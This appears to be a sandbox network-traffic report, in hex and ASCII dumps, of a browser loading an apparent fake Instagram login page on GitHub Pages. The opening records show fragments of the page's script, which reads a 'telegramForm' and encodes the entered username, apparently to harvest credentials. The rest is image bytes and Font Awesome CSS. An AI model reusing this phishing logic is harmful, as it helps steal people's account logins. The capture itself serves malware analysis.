                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 66 6f 72 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 65 6c 65 67 72 61 6d 46 6f 72 6d 27 29 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 6c 6f 61 64 69 6e 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 61 64 69 6e 67 27 29 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 76 61 6c 69 64 54 65 78 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 69 6e 76 61 6c 69 64 22 29 20 0d 0a 20 20 20 20 6c 65 74 20 74 72 79 43 6f 75 6e 74 20 3d 20 30 3b 20 2f 2f 20
                                                                                                                                                                                                                                Data Ascii: document.addEventListener('DOMContentLoaded', () => { const form = document.getElementById('telegramForm'); const loading = document.getElementById('loading'); const validText = document.querySelector(".invalid") let tryCount = 0; //
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: b4 d0 b5 d1 80 d0 b6 d0 ba d0 b0 20 d0 bf d0 b5 d1 80 d0 b5 d0 b4 20 d0 be d1 82 d0 bf d1 80 d0 b0 d0 b2 d0 ba d0 be d0 b9 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 49 6e 74 65 72 76 61 6c 28 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 61 64 69 6e 67 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 66 6c 65 78 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 35 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6e 63 6f 64 65 64 55 73 65 72 6e 61 6d 65 20 3d 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 29 3b 0d 0a 20 20 20 20
                                                                                                                                                                                                                                Data Ascii: setInterval(() => { loading.style.display = 'flex'; }, 500); const encodedUsername = encodeURIComponent(username.value);
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC456INData Raw: 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 61 74 63 68 28 28 65 72 72 6f 72 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 65 72 74 28 22 45 72 72 6f 72 21 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 3a 20 22 20 2b 20 65 72 72 6f 72 2e 6d 65 73 73 61 67 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 72 72 6f 72 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 61 64 69 6e 67 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 6e 6f 6e 65 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 73 65 72
                                                                                                                                                                                                                                Data Ascii: }) .catch((error) => { alert("Error! Please try again: " + error.message); console.log(error); loading.style.display = 'none'; user


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                4192.168.2.449739185.199.110.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC634OUTGET /instagram.com/img//instagram-logo.png HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC739INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 3841
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                x-origin-cache: HIT
                                                                                                                                                                                                                                Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                ETag: "669df693-f01"
                                                                                                                                                                                                                                expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=600
                                                                                                                                                                                                                                x-proxy-cache: MISS
                                                                                                                                                                                                                                X-GitHub-Request-Id: AD25:1EEB85:2E07C1E:334C753:66F8DD2E
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Age: 61
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:03 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740072-EWR
                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                X-Timer: S1727585643.090516,VS0,VE1
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: 76b6c090270bce202d9812b477c18d6ed13d839f
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 ce 00 00 00 3a 08 03 00 00 00 cf c2 96 f9 00 00 02 fd 50 4c 54 45 00 00 00 23 1f 20 23 1f 20 ff ff ff 23 20 20 24 1f 24 23 1f 20 27 21 21 40 20 40 23 20 20 24 24 24 24 20 21 23 1f 20 28 22 22 23 1f 20 2b 2b 2b 24 24 24 25 21 21 55 55 55 23 20 21 80 80 80 27 21 21 24 1f 21 24 20 21 25 1f 25 24 1f 20 2e 2e 2e 23 20 23 23 20 21 2e 23 23 23 20 21 29 23 23 40 40 40 28 22 22 23 20 22 25 20 25 26 21 21 24 20 21 23 20 23 24 21 21 29 29 29 24 20 20 23 20 21 25 1f 21 33 33 33 25 22 22 24 20 24 23 20 21 24 1f 21 24 20 21 24 20 21 24 20 20 26 22 22 39 39 39 26 26 26 25 20 22 23 1f 20 27 27 27 26 21 21 28 28 28 23 1f 21 24 20 21 24 24 24 25 1f 22 23 20 22 24 20 20 24 1f 21 23 23 23 23 20 21 24 20 20 24 1f 21 25
                                                                                                                                                                                                                                Data Ascii: PNGIHDR:PLTE# # # $$# '!!@ @# $$$$ !# (""# +++$$$%!!UUU# !'!!$!$ !%%$ ...# ## !.### !)##@@@(""# "% %&!!$ !# #$!!)))$ # !%!333%""$ $# !$!$ !$ !$ &""999&&&% "# '''&!!(((#!$ !$$$%"# "$ $!#### !$ $!%
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: dd 3b 7d dd fa 36 d3 06 53 bc b3 72 c4 8d 1d 7b e6 27 c3 12 0a e0 82 02 2d a1 8c 8e dd c6 7c 83 0b c9 3e 82 f2 bb 85 24 75 4a 8f 9a 74 1a f6 ba 2e 0d b6 c2 cd b5 9f 2d 80 47 74 ed 18 16 5f 02 d7 76 8a 95 30 fe 54 7f 80 2f d8 f8 64 36 92 d2 26 c2 23 30 e2 8b 18 8e db 9f 0c 1c 8b 0e 78 a7 b3 15 fe 57 ec e6 f7 23 fd 03 ba 65 01 eb a6 27 c0 f6 e9 e3 ad 92 21 56 75 7a f2 23 58 5e be ed d9 34 18 6b 49 06 21 ae 36 e9 7c 4b f2 86 0c 88 c3 11 24 83 cd b3 e1 58 14 43 92 e1 c7 e0 78 9b 22 13 ae 5d c3 a9 2e 0b bd 48 f6 bf cb 5d 8f 8c cb a8 82 2d 76 f9 19 f1 e3 2a 00 98 75 e1 96 62 7a 3d aa ae c9 cf 93 51 8b 5b 43 f5 26 d9 2e 09 a8 96 22 7f fb 68 00 48 8b 24 b9 e6 35 38 64 70 45 10 cd 4d 65 1b ec 96 ec b1 7e aa 5f 9c 41 75 88 a2 32 cd d0 17 14 3b e0 88 8f a2 ed 89 66
                                                                                                                                                                                                                                Data Ascii: ;}6Sr{'-|>$uJt.-Gt_v0T/d6&#0xW#e'!Vuz#X^4kI!6|K$XCx"].H]-v*ubz=Q[C&."hH$58dpEMe~_Au2;f
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1085INData Raw: 21 f7 51 3d 67 cf d9 67 10 13 d7 c3 a8 41 a1 c3 ed 4f b3 22 18 4b 31 0d c0 87 e4 9b f0 d6 da 3c 64 b2 49 6d 8a a1 9e 29 d9 e8 6d 78 b8 cf bc 6b 46 c1 33 ae ba 81 03 7a af 79 ce ce 7c 09 3b 9a 71 00 87 28 ea 9b cf ad f6 7a 3e 4d 95 05 24 9b d3 ba 66 67 99 74 b2 dc 02 cb 26 50 23 28 5a 00 ad 63 b8 a7 01 6c 8d b4 13 f9 24 82 3d 7a 98 d4 0b a2 28 22 63 01 33 85 9f 9a 7d 7f 9d f7 cb 5c dd 1e 9e 2f db 13 cc d6 18 4f b1 0b aa be a7 c9 39 e5 d9 33 9f 51 24 02 c8 90 e0 9c de bf be 62 18 2f 50 fc ec 5e e1 3c 05 73 4a f9 0c 12 6e 71 a6 d7 ed 13 13 fb 73 6d 28 97 e2 0d ab 9a 2c a7 78 19 62 96 bb bf 81 7c 8a 07 bd 4f 8a 2b a3 b8 ad 00 b6 a4 08 b7 bd ab 45 f7 46 c5 91 66 e6 a5 96 11 41 d3 2f fc 40 d1 ce b9 24 7b 27 e9 21 df 03 63 8c 16 97 24 b3 3a 03 a1 be a4 78 37 f6
                                                                                                                                                                                                                                Data Ascii: !Q=ggAO"K1<dIm)mxkF3zy|;q(z>M$fgt&P#(Zcl$=z("c3}\/O93Q$b/P^<sJnqsm(,xb|O+EFfA/@${'!c$:x7


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                5192.168.2.449740104.17.25.144432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC576OUTGET /ajax/libs/font-awesome/6.5.2/css/all.min.css HTTP/1.1
                                                                                                                                                                                                                                Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://sayidanur.github.io
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC918INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:03 GMT
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                ETag: W/"660cc074-5556"
                                                                                                                                                                                                                                Last-Modified: Wed, 03 Apr 2024 02:35:32 GMT
                                                                                                                                                                                                                                cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                Age: 817970
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 04:54:03 GMT
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2FPZ%2BQau0b2JCfv0L4GoH08wTDLIkLYhUxzQLorHmrQf15Uv9LAVarzZzV%2FBPM4VQF7roduFddviL%2FYXgYM0O%2BaYrN1LpD8ywCNiv88jacmVfSBVVlyxEEd5UKLa28ssF6fBI5bN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ca95f7d9a4943fd-EWR
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC451INData Raw: 33 39 38 39 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 35 2e 32 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                                                                                                                                                                                                Data Ascii: 3989/*! * Font Awesome Free 6.5.2 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2024 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1369INData Raw: 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 63 6c 61 73 73 69 63 2c 2e 66 61 2d 72 65 67 75 6c 61 72 2c 2e 66 61 2d 73 6f 6c 69 64 2c 2e 66 61 72 2c 2e 66 61 73 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 46 72 65 65 22 7d 2e 66 61 2d 62 72 61 6e 64 73 2c 2e 66 61 62 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 42 72 61 6e 64 73 22 7d 2e 66 61 2d
                                                                                                                                                                                                                                Data Ascii: tialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1369INData Raw: 67 68 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 70 75 6c 6c 2d 72 69 67 68 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30
                                                                                                                                                                                                                                Data Ascii: ght:var(--fa-pull-margin,.3em)}.fa-pull-right{float:right;margin-left:var(--fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0s);animation-delay:var(--fa-animation-delay,0
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1369INData Raw: 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63
                                                                                                                                                                                                                                Data Ascii: -animation-timing,cubic-bezier(.28,.84,.42,1));animation-timing-function:var(--fa-animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-c
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1369INData Raw: 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f
                                                                                                                                                                                                                                Data Ascii: on-delay:var(--fa-animation-delay,0s);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animation-duration:var(--fa-animatio
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1369INData Raw: 32 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69
                                                                                                                                                                                                                                Data Ascii: 2s);animation-duration:var(--fa-animation-duration,2s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timing-function:var(--fa-animati
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1369INData Raw: 64 75 72 61 74 69 6f 6e 3a 30 73 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a
                                                                                                                                                                                                                                Data Ascii: duration:0s}}@-webkit-keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1369INData Raw: 65 59 28 30 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62
                                                                                                                                                                                                                                Data Ascii: eY(0)}to{-webkit-transform:scale(1) translateY(0);transform:scale(1) translateY(0)}}@keyframes fa-bounce{0%{-webkit-transform:scale(1) translateY(0);transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-b
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1369INData Raw: 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61
                                                                                                                                                                                                                                Data Ascii: ebkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opacity,.4);-webkit-transform:sca
